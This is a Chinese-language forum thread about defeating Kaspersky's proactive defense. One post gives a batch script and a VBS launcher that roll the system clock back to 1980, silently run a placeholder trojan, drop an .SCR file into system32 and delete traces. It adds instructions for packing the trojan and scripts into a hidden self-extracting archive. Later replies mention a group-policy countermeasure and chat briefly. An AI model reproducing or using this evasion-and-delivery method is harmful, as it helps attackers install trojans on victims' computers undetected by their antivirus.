返回列表 发帖
主动防御真是让人伤脑筋..............
帖子2 精华0 积分9 阅读权限40 在线时间3 小时 注册时间2006-10-25 最后登录2008-3-21 查看详细资料TOP

hzzlh
晶莹剔透§烈日灼然

TOP

让卡巴主动防御失效的代码:


第一个批量代码
date 1980-01-01

date 1980-01-01

@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End

:Next
%systemroot%\temp\你的木马名字.exe
copy %systemroot%\temp\tmp.SCR %systemroot%\system32\
fot %%f in (%temp%.\tmp$$$.vbs*) do del %%f

date 2007-2-17(当地时间)

RD /S /Q %systemroot%\temp\

第2个是vbs代码
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\temp\ser.bat(第一批量文件名字)", 0, TRUE)

把马+BAT文件+VBS文件 压缩成自解压文件 压的时候选高级-自解压选项 解压路径为%systemroot%\temp\ 然后下面解压后运行 写VBS脚本文件的名字 然后选择格式 安静模式选全部隐藏 覆盖方式选全部覆盖 之后 压缩 运行压缩好的文件就会发现 卡巴的主动防御 失效了 呵呵~~!
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP

hellokiddy
晶莹剔透§烈日灼然

TOP

一个简单的组策略就可以防住所谓的“更改时间让卡巴失效的阴谋”了呵呵 [s:36]
帖子1 精华0 积分6 阅读权限40 在线时间0 小时 注册时间2006-2-17 最后登录2007-3-19 查看详细资料TOP

帅得不敢出门
晶莹剔透§烈日灼然

TOP

我的卡巴经常遇到问题要重启产品  这个不知道是什么问题 要是能利用也是一个方法
帖子11 精华0 积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28 查看详细资料TOP

ws
晶莹剔透§烈日灼然

TOP

别人不是白混的。卖钱的太垃圾了谁会要?
白痴人才。

TOP

返回列表